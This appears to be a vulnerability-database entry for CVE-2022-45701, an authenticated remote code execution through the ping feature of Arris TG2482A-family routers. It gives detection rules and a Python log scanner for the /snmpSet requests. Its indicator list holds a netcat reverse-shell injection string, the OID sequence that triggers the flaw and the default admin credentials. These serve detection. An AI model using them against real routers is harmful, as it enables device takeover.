CVE-2022-45701
published 2023-02-17

CVE-2022-45701: Arris TG2482A firmware through 9.1.103GEM9 allows Remote Code Execution (RCE) via the ping utility feature.

Priority: P275, high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 45.31% (98.6th percentile)

Affected

3 ranges
Vendor | Product | Version range | Fixed in
commscope | arris_sbg10_firmware | <= 9.1.103 |
commscope | arris_tg2482a_firmware | <= 9.1.103 |
commscope | arris_tg2492_firmware | <= 9.1.103 |

Detection & IOCs (extracted from sources)

url: http://192.168.0.1/login
url: http://192.168.0.1/snmpSet
cookie: credential=<base64-auth-token>
command: $(nc%20<lhost>%20<lport>%20-e%20/bin/sh)
other: 1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;
other: 1.3.6.1.4.1.4115.1.20.1.1.7.2.0=<payload>;4;
other: 1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;
other: 1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;
other: 1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;
other: 1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;
  • Monitor HTTP GET requests to /snmpSet endpoint on Arris routers with OID parameters from the 1.3.6.1.4.1.4115.1.20.1.1.7.* subtree, especially OID .7.2.0 containing shell metacharacters or URL-encoded command injection strings (e.g., %20-e%20/bin/sh).
  • Detect HTTP GET requests to /login with an 'arg' query parameter containing a base64-encoded credential string, followed immediately by requests to /snmpSet with a 'credential' cookie — this sequence is characteristic of the exploit authentication flow.
  • Alert on URL-encoded netcat reverse shell patterns in HTTP query parameters targeting router management interfaces: look for 'nc%20' combined with '%20-e%20/bin/sh' in GET request URIs.
  • Flag sequential SNMP-over-HTTP SET operations to OIDs 1.3.6.1.4.1.4115.1.20.1.1.7.1.0 through .9.0 in rapid succession via GET /snmpSet, as this is the exact OID sequence used to arm and trigger the ping-based RCE.
  • The exploit requires prior authentication (valid admin credentials). The default credentials used in the PoC are admin:password — deployments using default credentials are immediately exploitable.
  • The exploit was tested against multiple Arris device models (TG2482A, TG2492, SBG10), so detection rules should not be scoped to a single model.
  • The RCE is delivered via the router's ping utility feature through SNMP OID manipulation over HTTP, not through a traditional SNMP UDP port — network-layer SNMP filtering alone will not block this attack vector.
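
The /snmpSet checks described above, as a log scanner. This is an added example, not code from this page or from any vendor. The log line layout, the rule names, the burst thresholds and the `<oid>=<value>;<type>;` query parsing are assumptions, and the sample lines are constructed with a placeholder value.

```python
import re
from urllib.parse import unquote, urlsplit

PING_SUBTREE = "1.3.6.1.4.1.4115.1.20.1.1.7."  # OID subtree listed on this page
TARGET_OID = PING_SUBTREE + "2.0"               # the OID the page singles out
# Characters a shell interprets; assumed never to appear in a legitimate value.
SHELL_META = re.compile(r"[$`|&;<>(){}\s\\]")
# Assumed query layout, taken from the IOC list: <oid>=<value>;<type>;
OID_SET = re.compile(r"((?:\d+\.)+\d+)=(.*?);(\d+);")
BURST_OIDS, BURST_SECONDS = 4, 10               # assumed thresholds, tune locally

# Constructed log lines in an assumed layout: "<epoch> <client> <method> <uri>".
SAMPLE = [
    "1700000000 192.0.2.50 GET /login?arg=PLACEHOLDER",
    "1700000001 192.0.2.50 GET /snmpSet?1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;",
    "1700000001 192.0.2.50 GET /snmpSet?1.3.6.1.4.1.4115.1.20.1.1.7.2.0=%24%28PLACEHOLDER%29;4;",
    "1700000002 192.0.2.50 GET /snmpSet?1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;",
    "1700000002 192.0.2.50 GET /snmpSet?1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;",
    "1700000300 192.0.2.9 GET /snmpSet?1.3.6.1.4.1.4115.1.20.1.1.7.2.0=198.51.100.4;4;",
]


def scan(lines):
    """Return (client, rule, detail) tuples for suspicious /snmpSet requests."""
    findings, recent = [], {}
    for line in lines:
        epoch, client, method, uri = line.split(None, 3)
        parts = urlsplit(uri.strip())
        if method != "GET" or parts.path != "/snmpSet":
            continue
        now = float(epoch)
        # Decode first so URL-encoded metacharacters are seen as the device sees them.
        for oid, value, _type in OID_SET.findall(unquote(parts.query)):
            if not oid.startswith(PING_SUBTREE):
                continue
            if oid == TARGET_OID and SHELL_META.search(value):
                findings.append((client, "shell-metachar-in-ping-target", value))
            # Keep only this client's ping OIDs seen inside the time window.
            seen = {o: t for o, t in recent.get(client, {}).items()
                    if now - t <= BURST_SECONDS}
            is_new = oid not in seen
            seen[oid] = now
            recent[client] = seen
            if is_new and len(seen) == BURST_OIDS:
                findings.append((client, "ping-oid-burst", ",".join(sorted(seen))))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The rules do not depend on the device model, in line with the note that detection should not be scoped to a single model.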